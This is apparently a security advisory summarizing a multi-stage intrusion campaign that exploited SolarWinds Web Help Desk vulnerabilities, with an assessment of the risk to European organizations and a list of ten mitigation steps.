Microsoft observed a sophisticated multi-stage intrusion exploiting internet-exposed SolarWinds Web Help Desk (WHD) instances to gain initial access and move laterally within targeted networks. The attackers achieved unauthenticated remote code execution by exploiting critical vulnerabilities, including untrusted data deserialization flaws (CVE-2025-40551 with CVSS 9.8, CVE-2025-26399 with CVSS 9.8) and a security control bypass vulnerability (CVE-2025-40536 with CVSS 8.1). Due to overlapping vulnerabilities on compromised machines, the exact exploited CVE remains uncertain. Upon exploitation, attackers executed arbitrary commands within the WHD application context, spawning PowerShell to download payloads via Background Intelligent Transfer Service (BITS). They deployed legitimate Zoho ManageEngine RMM components to establish persistent remote control, enumerated sensitive Active Directory users and groups, and established persistence through reverse SSH and RDP. Advanced stealth techniques included creating scheduled tasks to launch QEMU virtual machines under SYSTEM privileges to conceal backdoors, and DLL side-loading using the legitimate Windows executable wab.exe to dump LSASS memory for credential theft. At least one DCSync attack was observed, simulating a Domain Controller to extract password hashes from Active Directory. Post-exploitation tools included Velociraptor (version 0.73.4) with a known privilege escalation vulnerability (CVE-2025-6264), Cloudflared tunnels for redundant command-and-control, and disabling of Windows Defender and Firewall via registry modifications. The attackers implemented failover mechanisms for their C2 infrastructure and used legitimate administrative tools to maintain low-noise persistence. Huntress researchers linked the infrastructure to previous intrusions involving ToolShell exploitation and Warlock ransomware. The campaign underscores the criticality of patching internet-facing SolarWinds WHD instances and monitoring for anomalous administrative tool usage and behavior-based indicators across identity, endpoint, and network layers.

European organizations using SolarWinds Web Help Desk with internet-exposed instances face significant risk of initial compromise leading to full domain takeover. The exploitation enables attackers to execute arbitrary code without authentication, facilitating lateral movement, credential theft, and persistent remote access. Compromise of Active Directory through DCSync attacks can lead to widespread credential exposure, enabling attackers to access sensitive data, disrupt operations, or deploy ransomware. The use of legitimate administrative tools and stealthy persistence mechanisms complicates detection and response efforts. Disabling endpoint protection and firewall further increases exposure to follow-on attacks. The potential impact includes data breaches, operational disruption, reputational damage, and regulatory penalties under GDPR if personal data is compromised. Given the critical role of SolarWinds WHD in IT service management, exploitation can also disrupt IT support functions, exacerbating incident response challenges.

1. Immediately identify and patch all SolarWinds Web Help Desk instances, prioritizing those exposed to the internet. 2. Conduct thorough network scans to detect unauthorized RMM tools such as Zoho ManageEngine and remove or isolate them if not sanctioned. 3. Rotate all service and administrative account credentials, especially those with domain or elevated privileges. 4. Implement network segmentation to isolate critical assets and limit lateral movement from compromised hosts. 5. Deploy behavior-based detection solutions that monitor for living-off-the-land techniques, unusual PowerShell usage, and anomalous scheduled tasks or VM launches. 6. Monitor Active Directory logs for signs of DCSync and other credential theft activities. 7. Harden endpoint security by ensuring Windows Defender and firewall settings cannot be disabled by unauthorized users. 8. Use multi-factor authentication (MFA) on all administrative accounts to reduce risk of credential misuse. 9. Regularly audit and restrict remote access methods such as SSH, RDP, and Cloudflare tunnels. 10. Establish incident response playbooks specifically addressing SolarWinds WHD exploitation scenarios and conduct tabletop exercises to improve readiness.